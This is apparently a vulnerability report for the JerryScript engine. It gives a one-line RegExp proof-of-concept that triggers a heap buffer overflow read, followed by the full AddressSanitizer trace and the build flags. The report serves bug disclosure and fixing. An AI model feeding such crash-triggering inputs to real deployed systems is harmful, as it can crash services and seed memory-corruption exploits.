Description
the following poc can trigger a heap buffer overflow bugs.
RegExp("[\x0");
==3847==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb580075d at pc 0x081224b6 bp 0xbfb5e7f8 sp 0xbfb5e7e8
READ of size 1 at 0xb580075d thread T0
#0 0x81224b5 in lit_read_code_unit_from_hex /home/b/jerryscript/jerry-core/lit/lit-char-helpers.c:443
#1 0x81901c2 in re_parse_char_class /home/b/jerryscript/jerry-core/parser/regexp/re-parser.c:434
#2 0x818bd71 in re_parse_alternative /home/b/jerryscript/jerry-core/parser/regexp/re-compiler.c:390
#3 0x818d717 in re_compile_bytecode /home/b/jerryscript/jerry-core/parser/regexp/re-compiler.c:560
#4 0x8106af7 in ecma_op_create_regexp_object /home/b/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:292
#5 0x80af355 in ecma_builtin_regexp_dispatch_construct /home/b/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp.c:136
#6 0x80ae0dd in ecma_builtin_dispatch_call /home/b/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.inc.h:171
#7 0x80fbd5e in ecma_op_function_call /home/b/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:341
#8 0x81a83c6 in opfunc_call /home/b/jerryscript/jerry-core/vm/vm.c:425
#9 0x81a83c6 in vm_execute /home/b/jerryscript/jerry-core/vm/vm.c:2862
#10 0x81a9dd5 in vm_run /home/b/jerryscript/jerry-core/vm/vm.c:2942
#11 0x81a9dd5 in vm_run_global /home/b/jerryscript/jerry-core/vm/vm.c:232
#12 0x8058201 in jerry_run /home/b/jerryscript/jerry-core/api/jerry.c:558
#13 0x804c503 in main /home/b/jerryscript/jerry-main/main-unix.c:664
#14 0xb6fc2636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)
#15 0x804fc9d (/home/b/jerryscript/build/bin/jerry+0x804fc9d)
0xb580075d is located 0 bytes to the right of 13-byte region [0xb5800750,0xb580075d)
allocated by thread T0 here:
#0 0xb71f6dee in malloc (/usr/lib/i386-linux-gnu/libasan.so.2+0x96dee)
#1 0x804f4c4 in jmem_heap_alloc_block_internal /home/b/jerryscript/jerry-core/jmem/jmem-heap.c:324
#2 0x804f4c4 in jmem_heap_gc_and_alloc_block /home/b/jerryscript/jerry-core/jmem/jmem-heap.c:360
#3 0x804f4c4 in jmem_heap_alloc_block /home/b/jerryscript/jerry-core/jmem/jmem-heap.c:406
#4 0x806ab0b in ecma_new_ecma_string_from_utf8 /home/b/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:190
#5 0x8064a63 in ecma_find_or_create_literal_string /home/b/jerryscript/jerry-core/ecma/base/ecma-literal-storage.c:73
#6 0x812ccbb in parser_compute_indicies /home/b/jerryscript/jerry-core/parser/js/js-parser.c:201
#7 0x812ccbb in parser_post_processing /home/b/jerryscript/jerry-core/parser/js/js-parser.c:1421
#8 0x8139743 in parser_parse_source /home/b/jerryscript/jerry-core/parser/js/js-parser.c:2215
#9 0x813b528 in parser_parse_script /home/b/jerryscript/jerry-core/parser/js/js-parser.c:2712
#10 0x80578b1 in jerry_parse /home/b/jerryscript/jerry-core/api/jerry.c:384
#11 0x80578b1 in jerry_parse_named_resource /home/b/jerryscript/jerry-core/api/jerry.c:442
#12 0x804c49d in main /home/b/jerryscript/jerry-main/main-unix.c:655
#13 0xb6fc2636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/b/jerryscript/jerry-core/lit/lit-char-helpers.c:443 lit_read_code_unit_from_hex
Shadow bytes around the buggy address:
0x36b00090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x36b000a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x36b000b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x36b000c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x36b000d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fd fa
=>0x36b000e0: fa fa 00 fa fa fa 00 00 fa fa 00[05]fa fa fd fa
0x36b000f0: fa fa 00 05 fa fa 00 02 fa fa 00 06 fa fa 00 00
0x36b00100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x36b00110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x36b00120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x36b00130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==3847==ABORTING
the platform is ubuntu 16.04 and the build options are:
python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --jerry-libc=off --static-link=off --lto=off --error-message=on --system-allocator=on